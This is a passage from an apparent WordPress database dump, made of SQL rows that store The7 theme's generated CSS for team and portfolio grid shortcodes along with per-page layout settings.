.dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n}\n@media screen and (max-width: 767px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n}\n\";}'),
(15842,2898,'the7_shortcodes_dynamic_css','a:1:{s:32:\"78412dbe2aa1160dfb1540f02e3d1c99\";s:6508:\".dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99 .team-desc {\n  padding: 20px 20px 20px 20px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99 .team-author-name,\n.dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99 .team-author-name a {\n  margin-bottom: 0px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99 .team-author p {\n  margin-bottom: 10px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99  .team-media {\n  padding: 0px 0px 0px 0px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99 .dt-css-grid .team-media img {\n  max-width: 100%;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99 .team-content {\n  margin-bottom: 5px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99  .team-media,\n.dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99  .team-media a.rollover,\n.dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99  .team-media a.rollover *,\n.dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99  .team-media img {\n  border-radius: 0px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99 .soc-ico {\n  margin-bottom: 15px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99 .soc-ico a {\n  min-width: 26px;\n  min-height: 26px;\n  font-size: 16px;\n  border-radius: 100px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99 .soc-ico a:not(:last-child) {\n  margin-right: 4px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99 .soc-ico a:before,\n.dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99 .soc-ico a:after {\n  min-width: 26px;\n  min-height: 26px;\n  padding: inherit;\n}\n.dt-icon-border-on.dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99 .soc-ico a:before {\n  border: 0px solid transparent;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99 .soc-ico a:hover {\n  font-size: 16px;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99 .soc-ico a:hover .soc-font-icon {\n  color: rgba(255,255,255,0.75);\n  background: none;\n}\n.dt-icon-border-hover-on.dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99 .soc-ico a:after {\n  border: 0px solid transparent;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99 .soc-ico a:not(:hover) .soc-font-icon {\n  color: #ffffff;\n  background: none;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99 .soc-ico a .soc-font-icon {\n  font-size: 16px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99 .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99.resize-by-browser-width .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99.resize-by-browser-width .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n@media screen and (max-width: 1199px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n}\n@media screen and (max-width: 991px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n}\n@media screen and (max-width: 767px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n}\n\";}'),
(15843,2898,'the7_shortcodes_dynamic_css','a:1:{s:32:\"78412dbe2aa1160dfb1540f02e3d1c99\";s:6508:\".dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99 .team-desc {\n  padding: 20px 20px 20px 20px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99 .team-author-name,\n.dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99 .team-author-name a {\n  margin-bottom: 0px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99 .team-author p {\n  margin-bottom: 10px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99  .team-media {\n  padding: 0px 0px 0px 0px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99 .dt-css-grid .team-media img {\n  max-width: 100%;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99 .team-content {\n  margin-bottom: 5px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99  .team-media,\n.dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99  .team-media a.rollover,\n.dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99  .team-media a.rollover *,\n.dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99  .team-media img {\n  border-radius: 0px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99 .soc-ico {\n  margin-bottom: 15px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99 .soc-ico a {\n  min-width: 26px;\n  min-height: 26px;\n  font-size: 16px;\n  border-radius: 100px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99 .soc-ico a:not(:last-child) {\n  margin-right: 4px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99 .soc-ico a:before,\n.dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99 .soc-ico a:after {\n  min-width: 26px;\n  min-height: 26px;\n  padding: inherit;\n}\n.dt-icon-border-on.dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99 .soc-ico a:before {\n  border: 0px solid transparent;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99 .soc-ico a:hover {\n  font-size: 16px;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99 .soc-ico a:hover .soc-font-icon {\n  color: rgba(255,255,255,0.75);\n  background: none;\n}\n.dt-icon-border-hover-on.dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99 .soc-ico a:after {\n  border: 0px solid transparent;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99 .soc-ico a:not(:hover) .soc-font-icon {\n  color: #ffffff;\n  background: none;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99 .soc-ico a .soc-font-icon {\n  font-size: 16px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99 .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99.resize-by-browser-width .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99.resize-by-browser-width .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n@media screen and (max-width: 1199px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n}\n@media screen and (max-width: 991px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n}\n@media screen and (max-width: 767px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-78412dbe2aa1160dfb1540f02e3d1c99.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n}\n\";}'),
(15844,2898,'_wp_page_template','default'),
(15845,2898,'_wpb_vc_js_status','true'),
(15846,2898,'_dt_sidebar_position','disabled'),
(15847,2898,'_dt_sidebar_widgetarea_id','sidebar_1'),
(15848,2898,'_dt_sidebar_hide_on_mobile','0'),
(15849,2898,'_dt_footer_show','0'),
(15850,2898,'_dt_footer_widgetarea_id','sidebar_2'),
(15851,2898,'_dt_footer_hide_on_mobile','0'),
(15852,2898,'_dt_header_title','fancy'),
(15853,2898,'_dt_header_background','normal'),
(15854,2898,'_dt_header_background_below_slideshow','disabled'),
(15855,2898,'_dt_header_transparent_bg_color','#000000'),
(15856,2898,'_dt_header_transparent_bg_opacity','50'),
(15857,2898,'_dt_header_transparent_bg_color_scheme','light'),
(15858,2898,'_dt_header_disabled_background','normal'),
(15859,2898,'_dt_header_disabled_transparent_bg_color','#000000'),
(15860,2898,'_dt_header_disabled_transparent_bg_opacity','50'),
(15861,2898,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(15862,2898,'_dt_header_transparent_top_bar_bg_color',''),
(15863,2898,'_dt_header_transparent_top_bar_bg_opacity','0'),
(15864,2898,'_dt_header_disabled_transparent_top_bar_bg_color',''),
(15865,2898,'_dt_header_disabled_transparent_top_bar_bg_opacity','0'),
(15866,2898,'_dt_page_overrides_top_margin',''),
(15867,2898,'_dt_page_overrides_bottom_margin',''),
(15868,2898,'the7_shortcodes_inline_css','.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-bg-on.classic-layout-list article {\r\n  background: #f7f7f7;\r\n  -webkit-box-shadow: none;\r\n  box-shadow: none;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.dividers-on.classic-layout-list article {\r\n  margin-top: ;\r\n  padding-top: 0;\r\n  border-color: ;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.dividers-on.classic-layout-list article:first-of-type {\r\n  margin-top: 0;\r\n  padding-top: 0;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.classic-layout-list.mode-list .post-thumbnail-wrap {\r\n  width: ;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.classic-layout-list.mode-list .post-entry-content {\r\n  width: calc(100% - );\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.classic-layout-list.mode-list .no-img .post-entry-content {\r\n  width: 100%;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.bottom-overlap-layout-list .post-entry-content {\r\n  margin-top: -100px;\r\n  width: 75%;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.bottom-overlap-layout-list:not(.mode-list) .no-img .post-entry-content {\r\n  margin-top: 0;\r\n  width: 100%;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.bottom-overlap-layout-list.mode-list .no-img .post-entry-content {\r\n  margin-top: 0;\r\n}\r\n#page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-bg-on.gradient-overlap-layout-list .post-entry-content {\r\n  background: linear-gradient(to bottom,#f7f7f7,#f7f7f7) no-repeat 0px 150px;\r\n}\r\n#page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-bg-on.gradient-overlap-layout-list .post-entry-content:before {\r\n  background: #f7f7f7;\r\n  background: -moz-linear-gradient(top,rgba(247,247,247,0) 0%,rgba(247,247,247,0.9) 64%,#f7f7f7 83%,#f7f7f7 100%);\r\n  background: -webkit-linear-gradient(top,rgba(247,247,247,0) 0%,rgba(247,247,247,0.9) 64%,#f7f7f7 83%,#f7f7f7 100%);\r\n  background: linear-gradient(to bottom,rgba(247,247,247,0) 0%,rgba(247,247,247,0.9) 64%,#f7f7f7 83%,#f7f7f7 100%);\r\n}\r\n#page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-bg-on.gradient-overlap-layout-list .no-img .post-entry-content {\r\n  background: #f7f7f7;\r\n  padding: 30px 30px 30px 30px;\r\n}\r\n#page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-bg-on.gradient-overlap-layout-list .no-img .post-entry-content:before {\r\n  display: none;\r\n}\r\n#page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.gradient-overlay-layout-list .post-entry-content {\r\n  background: #f7f7f7;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.gradient-overlay-layout-list:not(.portfolio-shortcode):not(.albums-shortcode) .post-entry-content {\r\n  top: 20px;\r\n  right: 20px;\r\n  bottom: 20px;\r\n  left: 20px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.gradient-overlay-layout-list .post-head-wrapper,\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.gradient-overlay-layout-list .post-entry-wrapper {\r\n  right: 30px;\r\n  left: 30px;\r\n}\r\n#page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-rollover-layout-list .post-entry-content {\r\n  background: none;\r\n  padding: 0;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-rollover-layout-list .post-entry-content:before {\r\n  background: #f7f7f7;\r\n  background: -moz-linear-gradient(top,rgba(247,247,247,0) 0%,#f7f7f7 65%,#f7f7f7 100%);\r\n  background: -webkit-linear-gradient(top,rgba(247,247,247,0) 0%,#f7f7f7 65%,#f7f7f7 100%);\r\n  background: linear-gradient(to bottom,rgba(247,247,247,0) 0%,#f7f7f7 65%,#f7f7f7 100%);\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-rollover-layout-list .post-entry-wrapper {\r\n  padding: 20px 30px 30px 30px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-rollover-layout-list .post-entry-wrapper {\r\n  bottom: -15px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-rollover-layout-list.meta-info-off .post-entry-wrapper {\r\n  bottom: -5px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-rollover-layout-list article:not(.description-off) .post-entry-wrapper {\r\n  bottom: -20px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-rollover-layout-list:not(.disable-layout-hover) article:hover .post-entry-wrapper {\r\n  bottom: 0;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .filter a,\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .filter a * {\r\n  color: ;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .paginator a,\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .paginator a * {\r\n  color: ;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .filter-bg-decoration .filter-categories a.act {\r\n  color: #fff;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.mode-masonry) article {\r\n  margin-top: ;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.mode-masonry) article:first-of-type,\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.mode-masonry) article.visible.first {\r\n  margin-top: 0;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.dividers-on:not(.mode-masonry) article {\r\n  margin-top: 0;\r\n  padding-top: ;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.dividers-on:not(.mode-masonry) article:first-of-type,\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.dividers-on:not(.mode-masonry) article.visible.first {\r\n  margin-top: 0;\r\n  padding-top: 0;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.hover-scale article:after {\r\n  background: ;\r\n  background: -webkit-linear-gradient();\r\n  background: linear-gradient();\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.gradient-overlay-layout-list article {\r\n  border-radius: 0px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-thumbnail-wrap {\r\n  padding: 20px 20px 0px 20px;\r\n  border-radius: 0px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-thumbnail-wrap *,\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-thumbnail-rollover:after {\r\n  border-radius: 0px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.enable-bg-rollover .post-thumbnail-rollover:after {\r\n  background: ;\r\n  background: -webkit-linear-gradient();\r\n  background: linear-gradient();\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.gradient-overlay-layout-list) .post-thumbnail {\r\n  box-shadow: \"\";\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.gradient-overlay-layout-list article {\r\n  box-shadow: \"\";\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.gradient-overlay-layout-list) .post-thumbnail {\r\n  box-shadow: \"\";\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.gradient-overlay-layout-list article {\r\n  box-shadow: \"\";\r\n}\r\n.bottom-overlap-layout-list.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container {\r\n  height: calc(100% - 100px);\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a {\r\n  width: 44px;\r\n  height: 44px;\r\n  line-height: 44px;\r\n  border-radius: 100px;\r\n  margin: 10px 5px 10px;\r\n}\r\n.content-rollover-layout-list:not(.content-align-center).portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a,\r\n.gradient-overlay-layout-list:not(.content-align-center).portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a {\r\n  margin: 10px 10px 10px 0;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a:before,\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a:after {\r\n  border-width: 0px;\r\n}\r\n.dt-icon-bg-on.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a:before {\r\n  background: rgba(255,255,255,0.3);\r\n  -webkit-box-shadow: none;\r\n  box-shadow: none;\r\n}\r\n.dt-icon-hover-bg-on.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a:after {\r\n  background: rgba(255,255,255,0.5);\r\n  -webkit-box-shadow: none;\r\n  box-shadow: none;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a > span:before {\r\n  font-size: 16px;\r\n  line-height: 44px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a:not(:hover) > span {\r\n  color: 